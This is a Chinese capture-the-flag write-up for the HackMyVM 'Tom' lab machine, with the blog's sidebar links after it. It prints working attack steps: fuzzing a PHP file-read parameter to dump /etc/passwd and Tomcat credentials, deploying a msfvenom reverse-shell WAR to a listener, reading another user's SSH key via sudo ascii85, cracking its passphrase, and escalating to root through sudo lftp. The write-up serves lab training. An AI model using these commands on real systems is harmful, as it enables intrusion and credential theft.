渗透靶场——HackMyVM:Tom - 代码天地

渗透靶场——HackMyVM:Tom

数据库 2022-05-13 17:31:51 阅读次数: 0

部署环境

提供镜像文件后，直接用虚拟机打开即可，kali攻击机用VMware打开即可，靶机用vbox打开即可

kali攻击机ip地址：192.168.1.11（桥接）

靶机ip地址：（桥接自动获取ip）

信息收集

扫描主机

arp-scan -l

在这里插入图片描述
发现了存活主机的ip地址为192.168.1.69

扫描端口

扫描靶机开放的服务端口

nmap -p- -A 192.168.1.69

在这里插入图片描述
发现有22，80，8080端口进行开放，正常情况下我们现在先在80端口开始突破

Web渗透

http://192.168.1.69/

在这里插入图片描述首页是apache2的默认页面，右键源码中也没有找到任何可利用的信息，那就继续进行目录扫描看看

目录扫描

我在这里直接采用的还是kali自带的dirbuster
在这里插入图片描述发现tomcat.php的这个文件，尝试访问一下看看
发现界面什么都没有，右键查看源码也没有什么东西，那就进行模糊测试一下，看看是不是有什么其他东西
先进行命令执行

wfuzz -u http://192.168.1.69/tomcat.php?FUZZ=id -w /usr/share/wordlists/dirb/big.txt --hw=0

在这里插入图片描述
发现命令执行没有什么有用的东西，那就试试文件读取看看是不是有什么

wfuzz -u http://192.168.1.69/tomcat.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirb/big.txt --hw=0

在这里插入图片描述
检测到文件读取参数为filez，来收集一波敏感信息

http://192.168.1.69/tomcat.php?filez=/etc/passwd

在这里插入图片描述感觉这样看不舒服的话，可以直接右键查看源码也是可以

在这里插入图片描述个人感觉看etc/passwd文件要注意后面是/bin/bash的，同时也发现了nathan这个用户
用户nathan看看这个用户目录下面有没有id_rsa文件
发现什么都没有，那就有可能是自己没有权限或者其他的吧，那到此，80端口就先告一段落，接下来看看8080端口

http://192.168.1.69:8080/

在这里插入图片描述 Tomcat9的默认页面，可以通过管理页面上传反弹shell。但是需要账号密码，可以通过80端口的文件读取来获取tomcat的配置文件
然后在这里就直接得到用户名密码了，

用户名：sml
密码：H4ckMyP4$$w0rD!!!

在这里插入图片描述权限不够没有上传页面，没关系我们可以通过文件路径来上传

Msfvenom生成

1、用msfvenom生成反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f war -o shell.war

在这里插入图片描述
2、上传反弹shell

curl --upload-file shell.war -u ‘sml:H4ckMyP4$$w0rD!!!’ ‘http://192.168.1.69:8080/manager/text/deploy?path=/shell’

在这里插入图片描述
3、攻击机监听4444端口

nc -lvp 4444

在这里插入图片描述
4、访问shell触发反弹

http://192.168.1.69:8080/shell/

在这里插入图片描述
反弹成功，先切换到交互式shell

python3 -c ‘import pty;pty.spawn("/bin/bash")’

在这里插入图片描述
接下来继续查找一下敏感的信息

sudo -l

在这里插入图片描述

找到可以使用nathan用户身份执行ascii85命令。ascii85可以读取文件，尝试读取id_rsa文件

https://gtfobins.github.io/gtfobins/ascii85/

在这里插入图片描述

sudo -u nathan ascii85 /home/nathan/.ssh/id_rsa | ascii85 -d

在这里插入图片描述

拿到key保存为id_rsa文件再去登录SSH

vi id_rsa
chmod 600 id_rsa
ssh [email protected] -i id_rsa

在这里插入图片描述

发现还是登陆失败，原因是原来这个秘钥还有密码，那就直接爆破

这里给大家介绍一下爆破秘钥的工具
RSAcrack
自己小白，所以就用笨的方式给大家说一下了
首先先在github上面找到网址

https://github.com/d4t4s3c/RSAcrack

在这里插入图片描述
下载后把RSAcrack.sh复制到虚拟机里，并执行即可

./RSAcrack.sh -w /usr/share/wordlists/rockyou.txt -k /root/id_rsa

在这里插入图片描述
然后就获取到秘钥的密码，拿到key的密码，登录SSH

ssh [email protected] -i id_rsa

在这里插入图片描述
登录成功，先找找flag

ls
cat user.txt

在这里插入图片描述
拿到usr.txt，再来找找提权信息

sudo -l

在这里插入图片描述
我们可以使用root用户身份执行lftp命令，先找一下lftp如何提权

提权

sudo lftp -c ‘!/bin/bash’

在这里插入图片描述
提权成功，查看rootflag

cd /root
ls
cat r00t.txt

在这里插入图片描述
结束~

猜你喜欢

转载自blog.csdn.net/tlovejr/article/details/123786225

渗透靶场——HackMyVM:Tom

渗透靶场——HackMyVM:Pingme

渗透靶场——HackMyVM:BlackWidow

渗透靶场——HackMyVM:Sedem

渗透靶场——HackMyVM:Area51

DMZ靶场渗透

渗透靶场——Vulnhub:VulnCMS

whoami靶场渗透测试

渗透靶场——vulntarget-d综合靶场

webug靶场渗透基础攻略

搭建DVWA web渗透靶场

完整的渗透测试靶场通关

搭建DVWA渗透测试靶场

【DC-1靶场渗透】

【DC-8靶场渗透】

【DC-2靶场渗透】

【DC-4靶场渗透】

【DC-5靶场渗透】

【DC-3靶场渗透】

tom

搭建DVWA Web渗透测试靶场

常见渗透测试靶场系统

靶场｜Horizontall的一次简单渗透

VulnStack域环境靶场渗透(一)

使用phpstudy搭建渗透测试靶场环境

渗透靶场——Vulnhub:MinUv1

Web渗透漏洞靶场收集

Vulntarget靶场渗透笔记[持续更新中]

暗月内网靶场渗透笔记

网络安全、渗透测试靶场全集

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)